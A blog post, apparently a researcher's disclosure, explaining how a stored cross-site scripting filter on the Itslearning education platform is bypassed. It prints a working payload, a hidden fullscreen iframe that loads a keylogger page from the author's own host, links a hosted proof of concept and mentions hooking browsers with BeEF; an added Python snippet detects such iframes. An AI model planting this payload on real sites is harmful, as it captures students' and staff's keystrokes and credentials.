ITSLEARNING XSS PART 2


Today I want to explain to you how I am still able to execute JavaScript payloads on the Itslearning education system. Itslearning XSS part 2 begins!

You should check part 1 of this article.

ITSLEARNING STORED XSS VULNERABILITY OR NOT?

Mr. Håkon Høydal wrote an article about Itslearning. After that, Itslearning did some things to filter JavaScript code. But this is not enough, I guess.

Itslearning XSS - iFrame is the key!

With the help of an iframe which is fullscreen and hidden, I can execute my keylogger payload.

Payload and PoC:

<iframe src="https://mustafakemalcan.com/keylog.html" style="position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;">Your browser doesn’t support iframes</iframe>

PoC : https://files.itslearning.com/data/2099/13132/keylog.html
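
A server-side check for the pattern described above, as an added example that is not part of the original post or Itslearning's code: it flags embedding elements whose source host is not on an allowlist, and any element styled as a full-viewport overlay. The allowlist host, the function names and the sample markup are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

EMBED_TAGS = {"iframe", "frame", "object", "embed"}  # elements that load another document
ALLOWED_FRAME_HOSTS = {"video.example.test"}  # hypothetical allowlist of framed hosts
# Constructed sample modelled on the post's payload; the host is a placeholder.
SAMPLE = ('<p>Notes</p><iframe src="https://attacker.example/page.html" '
          'style="position:fixed; top:0px; left:0px; bottom:0px; right:0px; '
          'width:100%; height:100%; border:none; z-index:999999;">x</iframe>')

def parse_style(style):
    """Turn an inline style string into a {property: value} dict."""
    decls = {}
    for part in style.split(";"):
        name, sep, value = part.partition(":")
        if sep:
            decls[name.strip().lower()] = value.strip().lower()
    return decls

def covers_viewport(decls):
    """True for a fixed/absolute box pinned to all four edges or sized 100% x 100%."""
    if decls.get("position") not in {"fixed", "absolute"}:
        return False
    edges = [decls.get(e, "") for e in ("top", "left", "bottom", "right")]
    pinned = all(v.rstrip("px%em ") == "0" for v in edges)
    full = decls.get("width") == "100%" and decls.get("height") == "100%"
    return pinned or full

class EmbedAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag in EMBED_TAGS:
            host = urlparse(attrs.get("src") or attrs.get("data", "")).hostname or ""
            # Deny by default: relative, missing or unparseable sources are flagged too.
            if host not in ALLOWED_FRAME_HOSTS:
                self.findings.append((tag, "embeds " + (host or "non-allowlisted source")))
        if covers_viewport(parse_style(attrs.get("style", ""))):
            self.findings.append((tag, "full-viewport overlay style"))

def audit(html):
    """Return a list of (tag, reason) findings for user-submitted HTML."""
    auditor = EmbedAuditor()
    auditor.feed(html)
    return auditor.findings

if __name__ == "__main__":
    print(audit(SAMPLE))
```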

I can call my evil JS, by the way. So I can still use the BeEF XSS Framework.

Here are the logs.

I don’t consider the second XSS that harmful, but I think Itslearning shouldn’t allow something like that.

https://youtu.be/z6PUMjiNWX4

I need to say thanks to Ingvald Straume for the help in this process.
